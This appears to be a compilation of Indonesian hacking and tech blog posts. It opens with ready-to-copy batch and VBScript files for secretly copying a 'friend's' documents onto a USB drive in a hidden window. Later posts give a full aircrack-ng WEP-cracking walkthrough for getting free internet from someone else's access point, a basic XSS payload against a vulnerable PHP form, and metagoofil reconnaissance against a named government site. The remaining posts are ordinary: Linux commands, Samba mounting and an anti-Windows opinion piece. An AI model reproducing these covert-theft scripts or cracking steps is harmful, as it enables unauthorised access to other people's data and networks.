“Meminjam” Laporan “Teman” Diam-diam

Semenjak windows sudah pro-aktif memerangi autorun pada usb driver, aksi mencuri/meracuni isi komputer dari usb driver sudah sangat berkurang. Padahal teknik ini dapat mengambil atau memasukkan file tertentu dari/ke keomputer.

Tapi teknik ini sebenarnya masih dapat sangat berguna untuk “meminjam” beberapa file dat-data penting dari komputer “teman”. Apalagi kita masih bisa mendapatkan akses untuk memakai komputer “teman” tadi. Dengan sedikit alibi atau istilah beken nya social engineering, kita dapat mencuri data-data “teman” tanpa diketahui si “teman” tadi.

Caranya ya dengan batch file. Mungkin bagi yang jago komputer cara ini terdengar sangat dekat dengan dunia lamer, leecher, dan newb, berarti teknik ini ditujukan bagi yang belum tau saja.

Bikin file-file batch nya sederhana saja. Ada paling tidak dua file yang harus dibikin.

Sebelum “meminjam” data-data rahasia si “teman” ada beberapa hal yang perlu diketahui terlebih dahulu :

• Lokasi direktori file-file yang mau “dipinjam”
• Nama drive usb anda jika dicolok ke komputer si “teman” exp: C:\ , D:\ , E:\ , F:\.

Untuk mendapatkan informasi di atas caranya ya uji coba dulu kompi si “teman”. Jadi ada dua kali “meminjam” kompi si target. Pertama unutk mendapatkan informasi awal di atas dan kedua untuk “meminjam” data-data si target.

Berikut skrip-skrip file-file nya (jika nama drive usb H:\ dan fil-file yang mau “dipinjam” ada di C:\Downloads\) :

Tinggal copas skrip-skrip dibawah ke dalam notepad dan save sesuai namanya. Dan edit jika perlu.

• file tukang kopi (copy.bat) :

:: copy.bat
::
@echo off
echo
xcopy C:\Downloads\*.* H:\batman\ /C /S /D /Y /I

• File tukang jaga-jaga biar ga ketauan (invis.vbs) :

CreateObject(“Wscript.Shell”).Run “”"” & WScript.Arguments(0) & “”"”, 0, False

• File tukang suruh-suruh (launch.bat)

:: launch.bat
::
@echo off
echo.

wscript.exe “H:/invis.vbs” “copy.bat”

Save ketiga file gerombolan perampok diatas di flashdisk anda. Dan saat si “teman” lengah, langsung saja kasih aba-aba ke si file tukang suruh-suruh (launch.bat) untuk menjalankan misi rahasia dengan menjalankan nya. Selanjutnya biarkan mereka bertiga yang bekerja “meminjam” laporan-laporan “teman” anda. Hanya akan ada sedikit flashing prompt, tak akan berbahaya..hi hi.

Perlu diingat kalau contoh diatas akan mem-paste file-file ke folder bernama “batman” pada flashdisk. Jadi jangan lupa sebelumnya buat empty folder bernama “batman” di flashdisk anda.

Dan juga perlu diingat semua ini atas nama kebebasan informasi bukan untuk merampas hak orang lain

Cookies Ala Mrs.Yahoo

Cookies atau session cookies adalah sebuah tanda pengenal yang diberikan oleh sebuah website kepada usernya untuk mengenali atau mengambil suatu informasi dari user saat si user berkunjung kembali ke website tersebut.
Ibaratnya, bagi yang suka nonton konser atau ikut event-event di club mungkin sering diberi gelang atau distempel saat membeli tiket atau mendaftar masuk. Nantinya gelang atau tanda stempel tersebut akan dijadikan oleh petugas penjaga pintu masuk sebagai acuan bahwa si pemakai gelang adalah orang yang telah memiliki tiket dan berhak masuk.
Salah satu jenis website yang sering memberikan cookies adalah website portal. Diantara nya yaitu yahoo.com, yang merupakan salah satu email portal yang paling sering digunakan di dunia. Dan setiap website mempunyai cara dan teknik membuat dan memberikan cookies nya masing-masing.
Berikut adalah gambaran bagaimana yahoo mengeluarkan cookiesnya :

kronologi :

- Setelah semua cookies dihapus (dipastikan kosong) saya membuka page sign in yahoo dan yahoo hanya memberikan sebuah cookie

- Setelah login yahoo memberikan banyak cookies. Secara garis besar ada dua jenis yaitu yang berasal dari id.yahoo.com dan yahoo.com. Dan semua cookie memiliki cara enskripsi yang sama kecuali cookie “adx”. Dan perlu diperhatikan juga bagaimana cookie “B” berubah value disini.

- Setelah membuka mailpage yahoo memberikan beberapa cookies lagi. Tepatnya 4 buah cookies baru. Tidak terlihat jelas namun sepertinya 3 cookies memiliki cara enskripsi yang berbeda dari cookie-cookie yang didapatkan pada tahap sebelumnya.

- Saat membuka inbox yahoo tidak memberikan satupun cookie.

hhmmm…soo? apa maksudnya ya? mungkin dari beberapa data di atas anda dapat mengklasifikasi cookies yang diberikan yahoo. Mana cookie yang berisikan ini dan mana yang berisikan itu.

Segitu saja. Semoga bermanfaat dan jangan dimanfaatkan :s

What Makes XSS Alive ?

Sebelum masuk ke pembahasan judul saya mau kasi tau dulu kalau project RaniaGeo Samplebag kek nya akan behind schedule berhubung kondisi kesehatan tidak terlalu baik bulan ini.

Oke ke..udah curhatnya.

Gini..Saya mau kasi tau konsep dasar dari adanya XSS. Mungkin sudah ada yang tau apa itu XSS singkatan dari Cross Site Scripting.Mungkin udah banyak yang ngerti juga, tapi paling ga ya mengasah lagi pengetahuan kita dengan mengulang dan mengulang.

Jika dilihat dari namanya yang berarti “penulisan script memotong pada website”. Kira-kira gitu kali ya.

Dari namanya bisa kita tangkap bahwa maksudnya adalah menambahkan/memasukkan script tertentu kedalam script website yang sudah ada. Seperti yang telah kita ketahui bersama serangan (sebenarnya ga selalu berupa serangan si, tapi keknya disebut serangan biar lebih kedengaran hackingnya) XSS dapat dilakukan dengan memasukkan script tertentu pada url, input field, atau juga bisa langsung pada source nya.

Biar lebih jelas berikut contohnya :

misalnya code input php berikut

<*?php

$message = $_POST['message'];

if (isset($_POST['message']))
{

echo "Thank you, your message has been posted!";

echo "
";

echo $message;
}

echo "
<*form method='post' name='message_box'>
<*input type='text' name='message'>
<*input type='submit' name='submit'>
<*/form>";

?>

Pada bagian ‘message’ adalah input yang akan dimasukkan oleh user. Dan jika pada bagian ini dimasukkan input script berikut :

'><*script>alert("hallo")<*/script>

maka script tersebut akan otomatis dijalankan saat input di confirm.

Kuncinya adalah tag. Pada contoh kode input komen php diatas, jika input komen diconfirm maka komen akan ditampilkan pada page. Dengan kata lain page berubah yang juga berarti kode nya berubah.

Perubahannya adalah penambahan tag link yang memuat isi komen yang telah dimasukkan sebelumnya. Pada contoh diatas penambahan kodenya adalah munculnya kode dibawah :

echo "<*a href='$message'>Link<*/a>";

Pada kode diatas komen akan berada pada bagian ‘$message’. Sehingga jika komen/input yang dimasukkan diawali dengan (‘>) tanpa tanda kurung, maka tag link akan otomatis tertutup sehingga pada bagian input berikutnya dapat dimasukkan url/script tertentu.

Jadi mungkin begitulah konsep dasar dari XSS. Mungkin bagi anda tidak terlalu penting. Tapi kata orang bijak dasar adalah tempat kita berpijak, jadi kalau dasarnya samar-samar bisa dibayangkan betapa mudahnya anda terjatuh.

Segitu aja lah..terimakasih

Linux Commands part 1 : Bekerja dengan File

 

Terinspirasi dari tweet teman saya yang mengatakan menggunakan linux cenderung susah dan membingungkan, saya jadi tergerak untuk membuat artikel daftar perintah-perintah pada linux. Hitung-hitung barbagi pengalaman dan pengetahuan dari buku dan tutorial yang saya miliki.

Untuk bagian pertama ini saya akan menerangkan beberapa perintah dalam bekerja dengan file pada linux. Memang bukan semuanya, hanya perintah-perintah yang sering digunakan saja.

• cat

cat [opsi] File

Perintah ini menampilakn ouput isi file pada terminal.

contoh : # cat file.txt

contoh diatas akan menampilkan isi file “file.txt” .

• head

head [opsi] File

 

Perintah ini akan menampilkan head atau bagian baris awal file

contoh :

$ head Script.sh

#!/bin/sh

################

#Script untuk config     #

#   Switch and Router #

################

Salah satu opsi untuk perintah ini adalah -[nilai angka]. “Nilai angka” disini adalah untuk menampilkan jumlah baris awal yang akan ditampilakan. Misal :

$ head -10 Script.sh

maka akan menampilkan 10 baris awal pada file Script.sh

• less

less [opsi] File

Perintah ini adalah untuk menampilkan output di layer.  Bedanya dengan cat outputnya adalah  perintah ini menampilkan output saat file dijalankan. Contoh penggunaannya sama dengan perintah-perintah diatas :

less Script.sh

• more

more [-num] [+/pola] [+ jumlah line] File

Fungsi perintah ini kurang lebih sama dengan cat dan less, yaitu menampilkan output di layer. Namun dengan beberapa tambahan opsi, diantaranya :

-d : untuk menampilkan pesan pada akhir proses

+ num[jumlahbaris] : menampilkan output dimulai pada baris ke             [jumlahbaris]. Contoh : $ more +num5 Script.sh , maka akan mulai pada baris ke 5.

+/[string] :  akan meampilan kata [string]. Misalnya : $ more +/fuction Script.sh , maka akan menampilkan kata “fuction”.

• pwd

pwd [-LP]

Perintah ini akan menampilkan nama direktori (path) tempat kita bekerja pada saat ini. Opsinya yaitu :

-L : dengan simbolik link

-P : tidak dengan simbolik link

• cd

cd [opsi] Direktori

“change directory” yaitu untuk mengganti direktori kerja. Contoh :

$ cd /usr/lib/work

maka akan berpindah dierktori ke /usr/lib/work.

Untuk naik direktori digunakan opsi “..”. Contoh :

$ cd ..

• mkdir

mkdir [opsi] Direktori

Adalah perintah untuk membuat direktori baru. Contoh :

$ mkdir folder

maka akan membuat direktori baru bernama “folder”. Untuk membuat direktori baru dalam direktori baru digunakan opsi “-p”, misalnya :

$ mkdir -p user/files/pictures

• find

find [path] [expresi]

Adalah perintah untuk mencari file dengan kriteria yang telah ditentukan.  Path berarti direktori lokasi pencarian. Contoh :

mencari file dengan nama tertentu :

$  find ./root -name file.sh

mencari file dengan ekstensi tertentu :

$  find ./root -name <<*.doc>>

mencari file berdasarkan kepemilikan file :

$  find . -user root

me-list  semua direktori dan subdirektori :

$ find  . -type d

 

• ls

ls [opsi] File

Perintah ini untuk menampilkan file-file dalam direktori. Opsinya diantaranya :

-x : menampilkan secara horizontal

-p : menampilkan secara melebar

-l : menampilkan file beserta atributnya

-a : menampilkan semua file termasuk hidden file

-al : opsi -a dan -l

*.txt : menampilkan file berekstensi .txt

-s : menampilkan file berdasarkan ukuran file

/usr/bin : menampilkan file pada direktori /usr/bin

• which

which [opsi] NamaProgram

Perintah ini untuk mengetahui letak path suatu perintah. Contoh :

$ which -a perl

Akan menemukan direktori kerja program perl pada komputer.

• cp

cp [opsi] FileAsal FileBaru

Adalah perintah untuk duplikasi file (copy). Contoh :

$ cp file1 /root/files/file2

• rm

rm [opsi] File

Perintah untuk menghapus file.

 

• rmdir

rmdir [opsi] Direktori

Perintah untuk menghapus direktori.

 

 

 

 

 

 

 

Ide Buruk Cari PDF Pakai Metagoofil?

Lg asik asik cobain metagoofil eh dapat inspirasi. Entah ini ide brilian apa ga.

Metagoofill tu tool buat information gathering. Information gathering tu adalah salah satu tahap awal saat melakukan hacking website. Jadi kita cari data-data dulu dari website si target sebelum kita penetrate web nya. Biasanya data yang dicari pada tahap ini adalah kek nama author server websitenya, data update websetinya dan yang sejenis itu.

Kalo makai metagoofil kebanyakan data yang dapat berupa data yang bersifat dokumen seperti .pdf .ppt .doc ,dll.

Tapi bukan masalah hacking nya yang mau gw bahas kali ini. Kalo bahas hacking pakai metagoofil bisa berlarut-larut artikel gw

Yang mau gw bahas adalah ide gw soal metagoofil. Dari kemampuan metagoofill yang mampu mencari semua data yang bersifat dokumen pada suatu website, gw dapat ide buat gunain metagoofil buat searching file-file pdf. Maksudnya tak lain tak bukan ya buat cari bacaan buat belajar hehee.

Kalo mau make metagoofil harus dilinux. Kalo di windos gw belum nemu caranya.

Make metagoofil gampang kok tinggal ketik perintahnya trus jalankan!

ini contoh command (perintah) nya :

./metagoofil.py -d garutkab.go.id -f all -l 100 -o garutkab.html -t delme

command nya : ./metagoofil.py

option nya : -d : target

-f : jenis file yang dicari

-l : limit hasilnya

-o : nama output file

-t : direktori khusus yang mau ditelusur kalo perlu

ni  contoh screenshot metagoofil di kompi gw

Trus tinggal cek file html hasilnya di direktori instalisasi metagoofil.

nah apa pun targetnya, asalkan ada file dokumen nya pasti dapat. Siapa tau ada web yang punya pdf yang lagi kita cari-cari. Atau cuma pengen tau aja website itu punya dokumen apa aja. Tinggal pake metagoofil..hehehee

Mau download metagoofil di sini

Kalo mau belajar lebih jauh soal metagoofil di sini

Itu aja dah..lg sibuk blajar java nih bikin proyek

Oprak Aprik Perpustakaan FTP

Ada yang tau FTP?  File Transfer Protocol?

FTP adalah hal yang paling tua sejak internet ditemukan. Adalah protocol yang pertama dipakai saat internet pertamakali ditemukan. Cara kerjanya sederhana, mirip dengan file sharing di jaringan LAN. FTP walaupun yang paling tua tapi masih tetap digunakan sampai saat ini yaitu untuk download dan upload file-file.

FTP juga masih digunakan oleh beberapa perusahaan dan organisasi untuk melakukan file sharing antara sesama anggota/karyawan atau juga untuk publik. Anonymous FTP,-atau server FTP yang dapat diakses tanpa syarat-syarat tertentu seperti memasukkan password atau identitas lain-, ternyata dapat digunakan untuk mencari referensi belajar. FTP juga dipakai sebagai salah satu media di beberapa perpustakaan universitas-universitas besar di dunia.

Berikut beberapa daftar FTP server yang  sering gw buka yang di dalam nya terdapat data-data ilmiah yang mungkin dapat dijadikan referensi belajar :

• ftp://geologyftp.gg.uwyo.edu/
• ftp://ftp.inst.bnl.gov/
• ftp://ftp.hq.nasa.gov/
• http://ftpsearch.itb.ac.id/

Atau ada juga FTP search engine untuk mencari server FTP apa saja yang dapat diakses. Contohnya :

http://www.ftpsearch.net/

Google Dorks

• inurl:

Adalah query yang akan menampilkan  web” yang memiliki kata” yang         ditambahkan dibelaknag query dalam url nya. Misalnya (inurl:apaaja), maka hasil search akan menampilkan semua wb yang memiliki kata “apaaja” di dalam url nya. Misalnya akan dihasilkan web dengan url seperti ini : http://asunatikus.com/apaaja.php?id=12 atau http://asunatikus.com/about/apaaja

• site:

Pada query ini diisikan domain atau bagian domain suatu website. Dan akan mengeluarkan hasil semua web yang memiliki domain atau bagian domain yang dituliskan setelah query. Misal untuk query site:anakharam.co.id , maka akan dihasilkan semua web/alamat web yang memiliki domain “anakharam.co.id” yang tentu nya adalah semua page dan semua subdomain pada website anakharam.co.id.

Dan jika querynya sperti ini (site:my) maka akan menghasilkan semua web yang mengandung kata my dalam domainnya yang tentunya adalah web” dari negara malaysia yang memiliki identitas .my (read: dot m y)

• link:

Query ini akan menampilkan semua page/alamat website yang memiliki link seperti pada query

• related:

Query ini akan menampilkan semua website yang memiliki kesamaan dengan website yang disebutkan dalam query. Misalnya (related:google.com) maka akan menampilkan semua web search engine seprti google.

• info:

Query ini akan menampilkan semua informasi yang dimiliki google dari website yang disebutkan dalam query.

• define:

Query yang satu ini seperti kamus. Akan menampilkan semua definisi yang dimiliki google atas kata yang ada dalam query.

• intitle:

Query ini akan menampilkan semua alamt website yang memiliki dokumen dengan judul (title) seperti yand ditulis pada query.

• cache:

Query ini akan menampilkan semua cache yang dimiliki google dari website yang disebutkan dalam query.

• filetype:

Query ini akan memunculkan semua alamat web yang  berasal dari file dengan tipe yang disebutakan dalam titel. Misalnya (filetype:mp3) maka akan dihasilkan semua alamat web yang berisi file mp3. Query ini banyak digunakan untuk mendownload file-file tertentu seperti lagu, video, dll.

• intext:

Query ini akan mrenampilkan semua alamat web yang memiliki dokumen yang berisikan kata yang terdapat pada query.

Sebenarnya masih banyak lagi dork” lainnya , tapi itu adalah dork” yang umum digunakan.

Google dork memang cukup lekat dengan hacking karena dapat dimanfaatkan untuk membantu hacking. Seperti untuk menemukan vulnerable page pada suatu website atau menemukan backdoor pada suatu website. Tapi google dork adalah hanya alat bantu pencarian di mesin pencari Google. google dork memang dapat membantu anda melakukan hack tapi google dork bukanlah alat hacking yang sebenarnya.

Aircrack-ng : Internet Gratis Untuk Kita Semua

Syarat kondisi :

- Gunakan linux, rekomendasi : BackTrack

- Wi Fi ready

- Gunakan Aircrack-ng 9.0

- Paling kurang ada satu klien yang online

- Sinyal dari AP cukup kuat

Yang harus diketahu sebelumnya :

- MAC address ente

- BSSID (MAC address AP)

- ESSID : nama AP

-  Chanel AP

- Wireless interface

Contoh :

MAC Address : 00:0F:B5:88:AC:82

BSSID : 00:14:6C:7E:40:80

ESSID : teddy

Chanel : 9

NI : aTh0

Langkah-langkah :

1. Menampilkan Wireless interface pada Ap dengan mode monitor

pertama hentikan ath0 dengan perintah :

airmon-ng stop ath0

dan sistem akan merespon dengan :

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

gunakan perintah “iwconfig” untuk memastikan bahwa tidak ada ath0 lainnya. Hasilnya seharusnya seperti dibawah ini :

lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.

jika terdapat ath0 lain, matikan juga seperti langkah awal diatas.

Sekarang jalankan wrieless card pada chanel 9 dengan perintah :

airmon-ng start wifi0 9

Sistem akan merespon dengan :

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Kamu akan diberitahu bahwa ath0 telah dimasukkan kedalam mode monitor. Untuk memastikannya cek dengan perintah “iwconfig”. Dan respon sistem harusnya seperti ini :

lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:”" Nickname:”"
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Cek lebih lanjut tentang frekuensi chanel di sini

2. Tes injeksi paket wireless

Langsung saj gunakan perintah berikut :
aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0

-9 berarti tes injeksi
-e berarti nama AP
-a 00:14:6C:7E:40:80 adalah AP MAC Address

Sistem akan merespon :

09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests…
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests…
09:23:37 00:14:6C:7E:40:80 – channel: 9 – ‘teddy’
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%

Perhatikan persentase pada baris terakhir. Jika 100% berarti kamu cukup dekat dengan AP, namun jika kurang ada baiknya kamu lebih mendekat ke AP.

3. Capture IVs
Lakukan dengan perintah :
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0

-c 9 berarti wireless chanel
–bssid 00:14:6C:7E:40:80 berarti AP MAC Address
-w adalah perintah capture file yang berisikan IVs

Jika proses injeksi untuk mendapatkan IVs berhasil maka akan keluar tampilan seperti berikut :

CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782

4. Memalsukan AP authentication
Agar AP dapat menerima paket yang kita kirim, maka perlu memaslukan authentication nya. Lakukan pemalsuan dengan perintah :
aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

-1 berarti authentic palsu
0 berarti waktu hubungan dalam detik
-h 00:0F:B5:88:AC:82 adalah MAC Address kamu

jika berhasil :

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful

Pada beberapa kasus AP hanya akan memeberikan akses pada MAC address tertentu. Pada keaadaan ini kamu tidak akan bisa memalsukan authentic nya. Kecuali kamu tau salah satu MAC yang di "allowed" dan mengganti MAC Address kamu ke MAC address tersebut.

Untuk kasus seprti diatas kita lakukan perintah berikut :
tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”

dan setelah muncul pesan eror lakukan perintah berikut :
tcpdump -n -e -s0 -vvv -i ath0

pesan eror yang dibutuhkan adalah seperti ini :

11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station

Jika teteap gagal, berarti kamu perlu mencari "allowed MAC Address dengan cara lain yang sebenarnya banyak sekali.

5. Mendapatkan paket ARP
Lakukan perintah ini pada konsol baru :
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

ingat : pada konsol baru

Setelah perintah di atas dijalankan maka airplay-ng akan segera minginjek paket ARP yang dibaca.

Berikut tampilan nya jika injeksi sedang berlangsung :

Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...

6. Mendapatkan WEP key
Buka konsol baru lagi dan lakukan perintah :
aircrack-ng -b 00:14:6C:7E:40:80 output*.cap

atau/dan perintah berikut :
aircrack-ng -K -b 00:14:6C:7E:40:80 output*.cap

Dalam beberapa saat akan dihasilkan WEP key seperti pada tampilan berikut :

ircrack-ng 0.9

[00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%

Info lebih aircrack-ng.org

Sori agak jelimet. Emang kalo mau yang gratis harus usaha dikit..hehe

Linux Bercinta Dengan Windows : Share dari Linux ke Windows

 

Siapa bilang linux sama sekali anti dengan yang namanya windows. Saat ini windows memang masih lebih dominan digunakan oleh pengguna komputer seluruh dunia dibandingkan dengan linux. Salah satu alasan nya yaitu banyak nya software yang digunakan masyarakat hanya bisa digunakan dalam platform windows demin melindungi komersialitas softwarenya.

Jadi linux tetap harus bekompromi dengan windows. Caranya adlah dengan mengikat mesin windows ke mesin linux. Langkang-langkahnya seperti dibawah ini :

Note : Tentu saja dengan menjalankan perintah di terminal.

1- Buat direktori untuk mount
=====================================================
mkdir /mnt/
=====================================================

=====================================================
# mkdir windows
# ls -l
total 16
drwxr-xr-x 2 root root 4096 May 24 2005 cdroom
drwxr-xr-x 2 root root 4096 Oct 14 2005 flash
drwxr-xr-x 2 root root 4096 May 24 2005 floopy
drwxr-xr-x 2 root root 4096 Oct 17 14:31 windows
=====================================================
2- Share folder di Windows
Aktifkan share folder pada windows.

3- Mount ke mesin Windows
=====================================================
Mount the share: mount -t smbfs -o username=, password=(password) /// /mnt/

=====================================================

contoh :

=====================================================

mount -t smbf -o username=smshe,password=A2rfs //192.168.100.10/linux/ mnt/windows

=====================================================

4- Melepas ikatan dari mesin windows

=====================================================

unmount -t smbfs /mnt/windows

=====================================================

7 Dosa Windows 7

Sama seperti para pendahulunya- 2000,xp,vista-, windows 7 tidak mengizinkan user nya untuk mengubah sumber software windows nya taau bahkan cuma untuk mempelajarinya. Kenyataannya Microsoft menggunakan copyrigth, contract, dan paten untuk melegalkan kegiatan mengontrol komputer user.

 

Berdasarkan kepada sumber freesoftware ada 7 dosa besar windows 7, yaitu :

1. Meracuni Pendidikan

Sekarang, semua anak-anak didunia hanya dikenalkan dengan satu produsen perangkat lunak untuk komputer mereka, yaitu Microsoft. Microsoft dengan uang besar dan rayuan mereka berhasil mengajak lembag-lembaga pendidikan di seluruh dunia menggunakan Microsoft. Dunia pendidikan seharusnya memiliki sumber yang luas dan bebeas, bukan menjadi sasaran satu produsen saja seperti microsoft.

2. Menyerang privasi

Windows dengan sengaja memasukkan software mata-mata unutk membatasi penggunaannya oleh user yaitu Windows Genuine Advantage. Microsoft melegalkannya dengan mensyaratkan persetujuan user pada license agreement, sehingga windows dapat melakukan kegiatan mata-mata nya tanpa pemberitauan kepada user sebelumnya.

3. Sikap Memonopoli

Hampir pada semua komputer yang baru di beli sudah terinstal paket windows di dalam nya. Bahkan tanpa memberi kesempatan bagi user untuk memilih terlebih dahulu. Microsoft mendikte para produsen hardware komputer untuk hanya membuat hardware yang mendukung kerja sistem windows, padahal banyak yang menginginkan spek hardware yang berbeda.

4. Pemaksaan

Windows secara berkala melakukan update pada softwarenya, dan dengan paksa menghapus salinan lama. Sehingga ini merupakan sebuah pemaksaan bagi user untuk mengikuti perkembangan windows, sehingga user secara tidak langsung dipaksa mengganti hardware dan software pendukung mereka menjadi sesuai dengan apa yang dibutuhkan windows.

5. Penyalahgunaan standar

Microsoft membuat beberapa tipe-tipe file yang dihasilkan oleh software diluar windows menajdi tidak dapat digunakan pada software buatan microsoft. Contohnya adalah file berformat openDocument yang tidak bisa dibuka pada windows office yang berformat wordDocument. Begitu juga format pdf, walaupun akhirnya Microsot menyerah karena banyaknya jumlah pengguna file berformat pdf.

6.  Melawan Digital Restrictions Management (DRM)

Dengan Windows Media Player, Microsoft dengan bantuan perusahaan media lainnya membuat suatu larangan untuk memutar dan mengkopi media pada komputer user. Misalnya dengan kerjasama dengan NBC, Microsoft melarang user untuk  merekam tayangan yang mereka putar pada WMP, padahal mereka punya hak untuk merekam sebuah siaran tv.

7. Mengancam keamanan user

Microsoft sudah memiliki catatan sejarah yang panjang tentang keamanan komputer karena pada windows dapat tersebarkan virus dan mengakses remote komputer untuk melakukan spam pada komputer user. Karena software windows rahasia, maka user bergantung kepada Microsoft untuk mengatasi masalah keamanan komputer mereka.

Tapi sepertinya semangat anti Microsoft sudah mulai menyebar pada tingkat atas saat ini dengan tanda-tanda yang diperlihatkan produsen software besar lain di dunia seperti Google , Oracle, Mozilla.

Dan kita semua bisa ikut membantu untuk melawan Microsoft dengan menggunakan sistem operasi berbasiskan GNU/Linux sehingga kita dapat melakukan  share, memodifikasi, dan mempelajarinya sendiri.

Ingin lebih kenal GNU/Linux?..cek di sini